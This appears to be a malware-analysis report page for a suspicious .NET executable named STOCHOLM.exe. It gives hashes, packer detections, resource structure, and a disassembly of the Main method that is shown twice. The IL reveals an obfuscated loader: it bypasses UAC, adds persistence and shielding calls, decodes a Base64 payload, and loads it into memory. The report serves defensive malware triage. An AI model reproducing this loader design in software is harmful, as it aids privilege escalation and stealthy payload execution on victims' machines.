Suspicious
Suspect

2b74db9ac4b779aa0c90e105f6012511

PE Executable
|
MD5: 2b74db9ac4b779aa0c90e105f6012511
|
Size: 900.1 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
2b74db9ac4b779aa0c90e105f6012511
Sha1
6487a11310f83a9131583c13267a12fffb756d39
Sha256
a33b3cb7c2f7f4f13c4b0503d403ac9584655ef92a07d2c88ed38cc1b15f3b51
Sha384
9d9e83b59f79f235d6bb75a8b428f76c02f2bf1922fa649f6d2510cdc280dbf0a84a0bc35edc933e5ef9c78dbbf01d18
Sha512
76a580759d7b4f8cd66bb0290fb0a47fd243914cea5fed4327efb95c3dead869af32671b3355eeb31961655b4cd270268137e131ee6008849813e02f05d8f72d
SSDeep
12288:H75Gf8DzxhMU75Gf8DzxhMU2iND75Gf8DzxhMVySvgXOwI8J:H0f8DV90f8DVr1d0f8DVsCU8
TLSH
BE15890066B383D5C96D01FA85A6D6EC4E718DE27369C339D98AFE492D3225E130D3B7

PeID

.NET executable
MEW 11 SE 1.2
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
2b74db9ac4b779aa0c90e105f6012511
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.reloc
.rsrc
Resources
RT_ICON
ID:0002
ID:0
ID:0-preview.png
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
STOCHOLM.Form1.resources
pictureBox1.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.AboutBox1.resources
logoPictureBox.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.Properties.Resources.resources
50717a60645a4af7b9bfb1c63c7d50c2
ab17a496c2544c9abb52c3b4d0acc913
c87e769c5d124385a3f0c9ad9b7b3c74
e5bc2ea453f94c6492ca332948052232
e4dec12129a64275bb67ae075f53dbc5
e0183d6e3dd94f268675016ce4b802ff
b869f563364549c6a055f9875bf52777
babdf81f95504e84a22ffd479dc93a8b
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\Administrator\documents\visual studio 2010\Projects\STOCHOLM\STOCHOLM\obj\x86\Release\STOCHOLM.pdb
Module Name

STOCHOLM.exe
Full Name

STOCHOLM.exe
EntryPoint

System.Void WindowsFormsApplication1.Program::Main()
Scope Name

STOCHOLM.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v2.0.50727
Tables Header Version

512
WinMD Version

<null>
Assembly Name

STOCHOLM
Assembly Version

18.5.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

55
Main Method

System.Void WindowsFormsApplication1.Program::Main()
Main IL Instruction Count

104
Main IL

br IL_000D: nop br IL_0013: ldc.i4 1 conv.ovf.i1.un <null> conv.i1 <null> div <null> nop <null> br IL_0005: br IL_0013 ldc.i4 1 ldc.i4 2047593740 ldc.i4 1305845588 ldc.i4 632579234 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldloca V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc V_6 ldloc V_0 brtrue IL_0047: call System.Void WindowsFormsApplication1.UACBypass::Execute() leave IL_01B8: ret call System.Void WindowsFormsApplication1.UACBypass::Execute() call System.Void WindowsFormsApplication1.CoreManager::InitializeShield() call System.Void WindowsFormsApplication1.CoreManager::CheckLongevity() ldc.i4 60000 call System.Void WindowsFormsApplication1.Program::S(System.UInt32) ldc.i4 1244124813 ldc.i4 1305766580 ldc.i4 632656356 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) stloc V_1 ldloc V_1 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse IL_008B: ldloc V_1 leave IL_01B8: ret ldloc V_1 ldc.i4 2114407108 ldc.i4 1305766582 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1432588284 ldc.i4 1305766582 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 1366866314 ldc.i4 1305766576 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1685068557 ldc.i4 1305766576 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 818148685 ldc.i4 1305766578 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 214370645 ldc.i4 1305766578 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) call System.Byte[] System.Convert::FromBase64String(System.String) stloc V_2 ldc.i4 1132450136 ldc.i4 1305766594 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_3 ldc.i4 309885496 ldc.i4 1305766626 ldc.i4 632579236 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_4 ldc.i4 1780730267 ldc.i4 1305766642 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_5 call System.AppDomain System.AppDomain::get_CurrentDomain() ldloc V_3 ldc.i4 1 ldloc V_2 ldloc V_4 ldloc V_5 call System.Void WindowsFormsApplication1.Program::cell(System.AppDomain,System.String,Microsoft.VisualBasic.CallType,System.Byte[],System.String,System.String) leave IL_01A0: leave IL_01B8 pop <null> leave IL_01A0: leave IL_01B8 leave IL_01B8: ret ldloc V_6 brfalse IL_01B7: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> br IL_01BE: nop nop <null> br IL_01C6: br IL_0013 not <null> add.ovf <null> br IL_0013: ldc.i4 1 ret <null>
Module Name

STOCHOLM.exe
Full Name

STOCHOLM.exe
EntryPoint

System.Void WindowsFormsApplication1.Program::Main()
Scope Name

STOCHOLM.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v2.0.50727
Tables Header Version

512
WinMD Version

<null>
Assembly Name

STOCHOLM
Assembly Version

18.5.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

55
Main Method

System.Void WindowsFormsApplication1.Program::Main()
Main IL Instruction Count

104
Main IL

br IL_000D: nop br IL_0013: ldc.i4 1 conv.ovf.i1.un <null> conv.i1 <null> div <null> nop <null> br IL_0005: br IL_0013 ldc.i4 1 ldc.i4 2047593740 ldc.i4 1305845588 ldc.i4 632579234 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldloca V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc V_6 ldloc V_0 brtrue IL_0047: call System.Void WindowsFormsApplication1.UACBypass::Execute() leave IL_01B8: ret call System.Void WindowsFormsApplication1.UACBypass::Execute() call System.Void WindowsFormsApplication1.CoreManager::InitializeShield() call System.Void WindowsFormsApplication1.CoreManager::CheckLongevity() ldc.i4 60000 call System.Void WindowsFormsApplication1.Program::S(System.UInt32) ldc.i4 1244124813 ldc.i4 1305766580 ldc.i4 632656356 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) stloc V_1 ldloc V_1 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse IL_008B: ldloc V_1 leave IL_01B8: ret ldloc V_1 ldc.i4 2114407108 ldc.i4 1305766582 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1432588284 ldc.i4 1305766582 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 1366866314 ldc.i4 1305766576 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1685068557 ldc.i4 1305766576 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 818148685 ldc.i4 1305766578 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 214370645 ldc.i4 1305766578 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) call System.Byte[] System.Convert::FromBase64String(System.String) stloc V_2 ldc.i4 1132450136 ldc.i4 1305766594 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_3 ldc.i4 309885496 ldc.i4 1305766626 ldc.i4 632579236 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_4 ldc.i4 1780730267 ldc.i4 1305766642 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_5 call System.AppDomain System.AppDomain::get_CurrentDomain() ldloc V_3 ldc.i4 1 ldloc V_2 ldloc V_4 ldloc V_5 call System.Void WindowsFormsApplication1.Program::cell(System.AppDomain,System.String,Microsoft.VisualBasic.CallType,System.Byte[],System.String,System.String) leave IL_01A0: leave IL_01B8 pop <null> leave IL_01A0: leave IL_01B8 leave IL_01B8: ret ldloc V_6 brfalse IL_01B7: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> br IL_01BE: nop nop <null> br IL_01C6: br IL_0013 not <null> add.ovf <null> br IL_0013: ldc.i4 1 ret <null>
2b74db9ac4b779aa0c90e105f6012511 (900.1 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙